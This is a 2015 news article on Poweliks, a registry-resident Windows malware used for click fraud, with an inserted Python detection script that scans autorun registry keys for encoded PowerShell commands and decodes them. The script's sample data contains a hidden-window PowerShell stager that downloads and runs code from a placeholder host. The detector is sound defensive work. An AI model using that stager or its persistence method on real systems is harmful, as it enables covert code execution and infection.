Friday, 12 June 2015

Registry Malware Infecting Nearly 200,000 Computers

Malware that hides exclusively in the Windows Registry in order to evade detection and removal has infected nearly 200,000 computers in recent months. The malware, known as Poweliks, uses infected computers for click fraud and has even exploited a zero-day vulnerability in Windows to take over a computer completely. Once active, Poweliks first checks whether Windows PowerShell is present.

PowerShell is a scripting language that lets system administrators automate many tasks. It is present by default in Windows 7 and can also be installed on other versions of Windows. If PowerShell is not present, Poweliks downloads and installs it. PowerShell is later used to run an encoded script.

This script contains the malicious code and makes it possible to download and install additional malware. A key is then created in the Windows Registry so that the malware is loaded again at the next reboot of the system. Because Poweliks does not use a file on disk, as most malware does, but resides entirely in the Windows Registry, it should be harder to detect and remove.
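The persistence pattern described above, an autorun registry value that launches PowerShell with an encoded command, is something a defender can hunt for directly. The script below is an added example, not code from the article or from Symantec: it enumerates the common Run/RunOnce keys on Windows (the key list and the accepted spellings of the -EncodedCommand switch are assumptions, not taken from the article), flags values that invoke PowerShell with a base64 payload, and decodes that payload (UTF-16LE, as PowerShell expects it) so the analyst can read the script. Off Windows it runs against constructed sample values.

```python
"""
Flag autorun registry values that launch PowerShell with an encoded command
and decode the payload for inspection.

Added example, not code from the article or Symantec.  The autorun key list,
the switch spellings and the sample values below are assumptions/constructed.
"""
import base64
import binascii
import re
import sys
from typing import Dict, List, Optional, Tuple

# Well-known autorun locations to enumerate when running on Windows (assumed list).
RUN_KEYS = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
]

# powershell.exe accepts abbreviated switches, so match the common spellings
# of -EncodedCommand followed by a base64 token.
POWERSHELL = re.compile(r"powershell(?:\.exe)?", re.I)
ENCODED = re.compile(
    r"[-/](?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I
)


def encode_command(script: str) -> str:
    """Encode a script exactly the way powershell -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(token: str) -> Optional[str]:
    """Reverse the encoding; None if the token is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_encoded_powershell(values: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (value_name, command, decoded_script) for every autorun value
    that launches PowerShell with an encoded command."""
    findings = []
    for name, command in values.items():
        if not POWERSHELL.search(command):
            continue
        match = ENCODED.search(command)
        if not match:
            continue
        decoded = decode_command(match.group(1))
        findings.append((name, command, decoded if decoded is not None else "<undecodable>"))
    return findings


def read_autoruns() -> Dict[str, str]:
    """Enumerate string values under the autorun keys with winreg (Windows only)."""
    import winreg  # only available on Windows

    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    values: Dict[str, str] = {}
    for hive, path in RUN_KEYS:
        try:
            with winreg.OpenKey(hives[hive], path) as key:
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, index)
                    except OSError:  # no more values
                        break
                    if isinstance(data, str):
                        values[f"{hive}\\{path}\\{name}"] = data
                    index += 1
        except OSError:  # key absent or not readable
            continue
    return values


# Constructed sample autorun values: one benign entry and one hidden-window
# PowerShell stager.  The URL is a placeholder, not a real indicator.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT),
}

if __name__ == "__main__":
    autoruns = read_autoruns() if sys.platform == "win32" else SAMPLE_VALUES
    for value_name, cmd, script in find_encoded_powershell(autoruns):
        print(f"[!] {value_name}\n    cmd:     {cmd}\n    decoded: {script}")
```

A hit here is a starting point, not a verdict: legitimate management tooling also uses encoded commands, so the decoded script is what to judge. Run it from an elevated prompt if you want the HKLM keys as well as the current user's.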


The malware is used to commit click fraud: all kinds of pages containing advertisements are visited through a hidden browser window, and the criminals are paid for every ad displayed. One problem for victims of Poweliks is that the ads shown may themselves be malicious, so a computer infected with Poweliks can go on to pick up a variety of other threats, including ransomware.

According to anti-virus company Symantec, which published a report (pdf) on the malware, there are many cases in which ransomware was downloaded through the displayed ads. Remarkably, the malware is active mainly in the United States: of the 198,500 infected computers, 99.5% were in the US. That does not mean users in other countries are not at risk, however. The anti-virus vendor says Poweliks shows what future threats may look like, with cyber criminals even more determined to make money from their creations.
